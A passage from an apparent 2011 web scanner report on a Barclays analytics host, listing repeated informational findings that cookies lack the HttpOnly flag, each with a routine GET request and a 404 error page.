Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:26:36 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 156
Last-Modified: Tue, 03 May 2011 13:26:36 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:26:36 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Creditcards/P1242557963445 not found</P>
   </BODY>
</HTML>

16.132. http://tc.barclays.co.uk/CurrentAccounts/Moreforyourmoney/AdditionsActive/P1242557963802  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /CurrentAccounts/Moreforyourmoney/AdditionsActive/P1242557963802

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CurrentAccounts/Moreforyourmoney/AdditionsActive/P1242557963802 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:25:59 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 193
Last-Modified: Tue, 03 May 2011 13:25:59 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:25:59 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/CurrentAccounts/Moreforyourmoney/AdditionsActive/P1242557963802 not found</P>
   </BODY>
</HTML>

16.133. http://tc.barclays.co.uk/CurrentAccounts/Moreforyourmoney/CurrentAccountPlus/P1242557963790  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /CurrentAccounts/Moreforyourmoney/CurrentAccountPlus/P1242557963790

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CurrentAccounts/Moreforyourmoney/CurrentAccountPlus/P1242557963790 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:26:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 196
Last-Modified: Tue, 03 May 2011 13:26:02 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:26:02 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/CurrentAccounts/Moreforyourmoney/CurrentAccountPlus/P1242557963790 not found</P>
   </BODY>
</HTML>

16.134. http://tc.barclays.co.uk/Currentaccounts/P1242557963414  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Currentaccounts/P1242557963414

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Currentaccounts/P1242557963414 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:25:56 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 160
Last-Modified: Tue, 03 May 2011 13:25:56 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:25:56 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Currentaccounts/P1242557963414 not found</P>
   </BODY>
</HTML>

16.135. http://tc.barclays.co.uk/InfoBank/PersonalReserve/P1242557963784  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /InfoBank/PersonalReserve/P1242557963784

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InfoBank/PersonalReserve/P1242557963784 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:26:04 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 169
Last-Modified: Tue, 03 May 2011 13:26:04 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:26:04 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/InfoBank/PersonalReserve/P1242557963784 not found</P>
   </BODY>
</HTML>

16.136. http://tc.barclays.co.uk/Insurance/Carinsurance/Carinsurance/P1242557964058  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Insurance/Carinsurance/Carinsurance/P1242557964058

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Insurance/Carinsurance/Carinsurance/P1242557964058 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:27:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 180
Last-Modified: Tue, 03 May 2011 13:27:10 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:27:10 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Insurance/Carinsurance/Carinsurance/P1242557964058 not found</P>
   </BODY>
</HTML>

16.137. http://tc.barclays.co.uk/Insurance/Homeinsurance/FinerHighValueHomeInsurance/P1242557964022  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Insurance/Homeinsurance/FinerHighValueHomeInsurance/P1242557964022

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Insurance/Homeinsurance/FinerHighValueHomeInsurance/P1242557964022 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:27:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 196
Last-Modified: Tue, 03 May 2011 13:27:10 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:27:10 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Insurance/Homeinsurance/FinerHighValueHomeInsurance/P1242557964022 not found</P>
   </BODY>
</HTML>

16.138. http://tc.barclays.co.uk/Insurance/IncomeInsurance/BarclaysIncomeInsurance/P1242570870016  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Insurance/IncomeInsurance/BarclaysIncomeInsurance/P1242570870016

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Insurance/IncomeInsurance/BarclaysIncomeInsurance/P1242570870016 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:27:13 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 194
Last-Modified: Tue, 03 May 2011 13:27:13 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:27:12 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Insurance/IncomeInsurance/BarclaysIncomeInsurance/P1242570870016 not found</P>
   </BODY>
</HTML>

16.139. http://tc.barclays.co.uk/Insurance/LifeInsurance/LifeInsurancefromAviva/P1242557963444  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Insurance/LifeInsurance/LifeInsurancefromAviva/P1242557963444

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Insurance/LifeInsurance/LifeInsurancefromAviva/P1242557963444 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:27:13 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 191
Last-Modified: Tue, 03 May 2011 13:27:13 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:27:12 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Insurance/LifeInsurance/LifeInsurancefromAviva/P1242557963444 not found</P>
   </BODY>
</HTML>

16.140. http://tc.barclays.co.uk/Insurance/P1242557963438  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Insurance/P1242557963438

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Insurance/P1242557963438 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:27:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 154
Last-Modified: Tue, 03 May 2011 13:27:10 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:27:10 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Insurance/P1242557963438 not found</P>
   </BODY>
</HTML>

16.141. http://tc.barclays.co.uk/Loans/Ourloans/Personalloans/P1242557963928  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Loans/Ourloans/Personalloans/P1242557963928

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Loans/Ourloans/Personalloans/P1242557963928 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:26:31 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 173
Last-Modified: Tue, 03 May 2011 13:26:31 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:26:31 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Loans/Ourloans/Personalloans/P1242557963928 not found</P>
   </BODY>
</HTML>

16.142. http://tc.barclays.co.uk/Loans/P1242557963420  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Loans/P1242557963420

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Loans/P1242557963420 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:26:16 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 150
Last-Modified: Tue, 03 May 2011 13:26:16 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:26:16 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Loans/P1242557963420 not found</P>
   </BODY>
</HTML>

16.143. http://tc.barclays.co.uk/Mortgages/Fixedratemortgages/P1242557963470  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Mortgages/Fixedratemortgages/P1242557963470

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Mortgages/Fixedratemortgages/P1242557963470 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:27:14 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 173
Last-Modified: Tue, 03 May 2011 13:27:14 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:27:13 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Mortgages/Fixedratemortgages/P1242557963470 not found</P>
   </BODY>
</HTML>

16.144. http://tc.barclays.co.uk/PremierHomePage/P1242557952563  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /PremierHomePage/P1242557952563

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PremierHomePage/P1242557952563 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:26:12 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 160
Last-Modified: Tue, 03 May 2011 13:26:12 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:26:12 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/PremierHomePage/P1242557952563 not found</P>
   </BODY>
</HTML>

16.145. http://tc.barclays.co.uk/Savings/Comparesavingsaccounts/P1242564257686  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Savings/Comparesavingsaccounts/P1242564257686

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Savings/Comparesavingsaccounts/P1242564257686 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:27:05 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 175
Last-Modified: Tue, 03 May 2011 13:27:05 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:27:05 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Savings/Comparesavingsaccounts/P1242564257686 not found</P>
   </BODY>
</HTML>

16.146. http://tc.barclays.co.uk/Savings/FixedRateBonds/H1242557860616  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Savings/FixedRateBonds/H1242557860616

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Savings/FixedRateBonds/H1242557860616 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:26:41 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 167
Last-Modified: Tue, 03 May 2011 13:26:41 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:26:41 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Savings/FixedRateBonds/H1242557860616 not found</P>
   </BODY>
</HTML>

16.147. http://tc.barclays.co.uk/Savings/ISAs/H1242557860616  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Savings/ISAs/H1242557860616

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Savings/ISAs/H1242557860616 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:26:59 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 157
Last-Modified: Tue, 03 May 2011 13:26:59 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:26:59 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Savings/ISAs/H1242557860616 not found</P>
   </BODY>
</HTML>

16.148. http://tc.barclays.co.uk/Savings/P1242557963426  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Savings/P1242557963426

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Savings/P1242557963426 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TCID=0007af91-b6eb-2752-a537-8bbc00000043; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304455198683:ss=1304454071727; NSC_Cbsdmb`tGjstuQbsu`=4454b2367804; mbox=session#1304436163124-351101#1304439059|check#true#1304437259;

Response

HTTP/1.1 404 Not Found
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 03 May 2011 13:26:39 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 152
Last-Modified: Tue, 03 May 2011 13:26:39 GMT
Connection: Keep-Alive
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 17:26:38 GMT;path=/

<HTML>
   <HEAD>
       <TITLE>Touch Clarity System Error</TITLE>
   </HEAD>
   <BODY>
       <H1>Error</H1>
       <P>/Savings/P1242557963426 not found</P>
   </BODY>
</HTML>

16.149. http://tc.barclays.co.uk/c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c?siteID=484&ts=1304436165921&ccID=P_Home_Main&ccID=P_Home_Row2_Left&ccID=P_Home_Row2_Right&ccID=P_Home_Col2&ccID=P_Home_Col3&ccID=P_Home_Col4&log=no&location=http%3A%2F%2Fwww.barclays.co.uk%2FPersonalBanking%2FP1242557947640&tagv=5.3&tz=-300&r=empty&title=Barclays%20Personal%20Banking%20%7C%20ISAs%20%7C%20Barclays%20latest%20ISA%20rates%20-%20Barclays&cd=16&ah=1156&aw=1920&sh=1200&sw=1920&pd=16 HTTP/1.1
Host: tc.barclays.co.uk
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/js//tc_targeting.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454124377:ss=1304454071727; mbox=check#true#1304436224|session#1304436163124-351101#1304438024

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Date: Tue, 03 May 2011 10:22:49 GMT
Content-Type: text/javascript; charset=ISO-8859-1
Content-Length: 14039
Last-Modified: Tue, 03 May 2011 10:22:49 GMT
Connection: Keep-Alive
